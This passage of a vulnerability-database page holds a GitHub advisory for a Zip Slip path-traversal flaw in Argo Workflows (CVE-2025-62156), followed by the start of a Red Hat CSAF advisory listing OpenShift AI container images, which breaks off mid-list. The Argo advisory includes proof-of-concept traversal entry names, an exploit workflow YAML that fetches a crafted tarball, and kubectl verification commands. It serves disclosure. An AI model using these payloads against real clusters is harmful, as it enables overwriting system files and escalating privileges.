"details": "### **Vulnerability Description**\n\n#### Vulnerability Overview\n\n1. During the artifact extraction process, the `unpack()` function extracts the compressed file to a temporary directory (`/etc.tmpdir`) and then attempts to move its contents to `/etc` using the `rename()` system call,\n2. However, since `/etc` is an already existing system directory, the `rename()` system call fails, making normal archive extraction impossible.\n3. At this point, if a malicious user sets the entry name inside the `tar.gz` file to a path traversal like `../../../../../etc/zipslip-poc`,\n4. The `untar()` function combines paths using `filepath.Join(dest, filepath.Clean(header.Name))` without path validation, resulting in `target = \"/work/input/../../../../../etc/zipslip-poc\"`,\n5. Ultimately, the `/etc/zipslip-poc` file is created, bypassing the normal archive extraction constraints and enabling direct file writing to system directories.\n\n#### untar(): Writing Files Outside the Extraction Directory\n\nhttps://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993\n\n1. **Base Path**: `/work/tmp` (dest) \u2014 The intended extraction directory in the wait container \n2. **Malicious Entry**: `../../../../../../../../../..//mainctrfs/etc/zipslip-ok.txt` (`header.Name`) \u2014 Path traversal payload \n3. **Path Cleaning**: `filepath.Clean(\"../../../../../../../../../..//mainctrfs/etc/zipslip-ok.txt\") = /mainctrfs/etc/zipslip-ok.txt` \u2014 Go\u2019s path cleaning normalizes the traversal \n4. **Path Joining**: `filepath.Join(\"/work/tmp\", \"/mainctrfs/etc/zipslip-ok.txt\") = /mainctrfs/etc/zipslip-ok.txt` \u2014 Absolute path overrides base directory \n5. **File Creation**: `/mainctrfs/etc/zipslip-ok.txt` file is created in the wait container \n6. **Volume Mirroring**: The file appears as `/etc/zipslip-ok.txt` in the main container due to volume mount mirroring\n\n### PoC\n\n#### PoC Description\n\n1. The user uploaded a malicious `tar.gz` file to S3 that contains path traversal entries like `../../../../../../../../../..//mainctrfs/etc/zipslip-ok.txt` designed to exploit the vulnerability.\n2. In the Argo Workflows YAML, the artifact\u2019s path is set to `/work/tmp`, which should normally extract the archive to that intended directory.\n3. However, due to the vulnerability in the `untar()` function, `filepath.Join(\"/work/tmp\", \"/mainctrfs/etc/zipslip-ok.txt\")` resolves to `/mainctrfs/etc/zipslip-ok.txt`, causing files to be created in unintended locations.\n4. Since the wait container\u2019s `/mainctrfs/etc` and the main container\u2019s `/etc` share the same volume, files created in the wait container become visible in the main container\u2019s `/etc/` directory.\n5. Consequently, the archive that should extract to `/work/tmp` exploits the Zip Slip vulnerability to create files in the `/etc/` directory, enabling manipulation of system configuration files.\n\n#### exploit yaml\n\n```yaml\napiVersion: argoproj.io/v1alpha1\nkind: Workflow\nmetadata:\n generateName: zipslip-\nspec:\n entrypoint: main\n templates:\n - name: main\n container:\n image: ubuntu:22.04\n command: [\"sh\"]\n args: [\"-c\", \"echo \u0027Starting container\u0027; sleep 3000\"]\n volumeMounts:\n - name: etcvol\n mountPath: /etc\n inputs:\n artifacts:\n - name: evil\n path: /work/tmp \n archive:\n tar: {}\n http:\n url: \"https://zipslip-s3.s3.ap-northeast-2.amazonaws.com/etc-poc.tgz\"\n volumes:\n - name: etcvol\n emptyDir: {}\n```\n\n#### exploit\n\n1. Create Zipslip \n\u003cimg width=\"1300\" height=\"102\" alt=\"image (4)\" src=\"https://github.com/user-attachments/assets/74569df1-43f9-409d-b905-601bcb5998e2\" /\u003e\n\n2. Upload S3 \n\u003cimg width=\"1634\" height=\"309\" alt=\"image (5)\" src=\"https://github.com/user-attachments/assets/2bf4a90a-0f03-411d-9a31-3c7de4b399b4\" /\u003e\n\n\n3. Create Workflow \n\u003cimg width=\"1875\" height=\"865\" alt=\"image (1) (1)\" src=\"https://github.com/user-attachments/assets/fd01a4a7-c400-47a2-a8f0-427b0feabc7f\" /\u003e\n\n\n4. Run \n\u003cimg width=\"1799\" height=\"862\" alt=\"image (2)\" src=\"https://github.com/user-attachments/assets/18a68919-1529-4ca0-9ed4-b71e271ae38f\" /\u003e\n\n\n5. Exploit Success\n\u003cimg width=\"1363\" height=\"440\" alt=\"image (3)\" src=\"https://github.com/user-attachments/assets/ac0e834d-4734-4771-9d24-d6fd1ce5d77f\" /\u003e\n\n ```bash\n # Find Workflow and Pod\n NS=default\n WF=$(kubectl get wf -n \"$NS\" --sort-by=.metadata.creationTimestamp --no-headers | awk \u0027END{print $1}\u0027)\n POD=$(kubectl get pod -n \"$NS\" -l workflows.argoproj.io/workflow=\"$WF\" --no-headers | awk \u0027END{print $1}\u0027)\n echo \"NS=$NS WF=$WF POD=$POD\"\n \n # Connect Main Container\n kubectl exec -it -n \"$NS\" \"$POD\" -c main -- bash\n \n # Exploit\n cd /etc/\n ls -l\n cat zipslip-ok.txt\n ```\n\n### Impact\n\n#### Container Isolation Bypass\n\nThe Zip Slip vulnerability allows attackers to write files to system directories like `/etc/` within the container, potentially overwriting critical configuration files such as `/etc/passwd`, `/etc/hosts`, or `/etc/crontab`, which could lead to privilege escalation or persistent access within the compromised container.",
"id": "GHSA-p84v-gxvw-73pf",
"modified": "2025-11-05T22:10:23Z",
"published": "2025-10-14T18:00:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62156"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-workflows"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-4023"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Argo Workflow has a Zipslip Vulnerability"
}
RHSA-2025:22759
Vulnerability from csaf_redhat - Published: 2025-12-04 13:06 - Updated: 2025-12-04 17:10Summary
Red Hat Security Advisory: RHOAI 2.22.3 - Red Hat OpenShift AI
Notes
Topic
Updated images are now available for Red Hat OpenShift AI.
Details
Release of RHOAI 2.22.3 provides these changes:
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images are now available for Red Hat OpenShift AI.",
"title": "Topic"
},
{
"category": "general",
"text": "Release of RHOAI 2.22.3 provides these changes:",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:22759",
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-12060",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-53643",
"url": "https://access.redhat.com/security/cve/CVE-2025-53643"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58183",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58754",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62156",
"url": "https://access.redhat.com/security/cve/CVE-2025-62156"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62727",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9905",
"url": "https://access.redhat.com/security/cve/CVE-2025-9905"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_22759.json"
}
],
"title": "Red Hat Security Advisory: RHOAI 2.22.3 - Red Hat OpenShift AI",
"tracking": {
"current_release_date": "2025-12-04T17:10:56+00:00",
"generator": {
"date": "2025-12-04T17:10:56+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2025:22759",
"initial_release_date": "2025-12-04T13:06:08+00:00",
"revision_history": [
{
"date": "2025-12-04T13:06:08+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-12-04T13:06:21+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-04T17:10:56+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift AI 2.22",
"product": {
"name": "Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_ai:2.22::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift AI"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-codeflare-operator-rhel9@sha256%3A8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764593039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3A7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-argoexec-rhel9@sha256%3A86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764181290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256%3Ac7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764181290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-operator-controller-rhel9@sha256%3Af27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product_id": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-feast-operator-rhel9@sha256%3A3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763051808"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product_id": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-feature-server-rhel9@sha256%3Ad5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763565765"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kf-notebook-controller-rhel9@sha256%3A687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kuberay-operator-controller-rhel9@sha256%3A2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609723"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kueue-controller-rhel9@sha256%3Ab7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609729"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-api-server-v2-rhel9@sha256%3A854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-driver-rhel9@sha256%3Af092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-launcher-rhel9@sha256%3A46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256%3A3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-runtime-generic-rhel9@sha256%3A65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764293130"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256%3A8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mlmd-grpc-server-rhel9@sha256%3Abfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594262"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mm-rest-proxy-rhel9@sha256%3A974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-operator-rhel9@sha256%3A901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594440"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-rhel9@sha256%3Ae0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594496"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-runtime-adapter-rhel9@sha256%3A1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594508"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
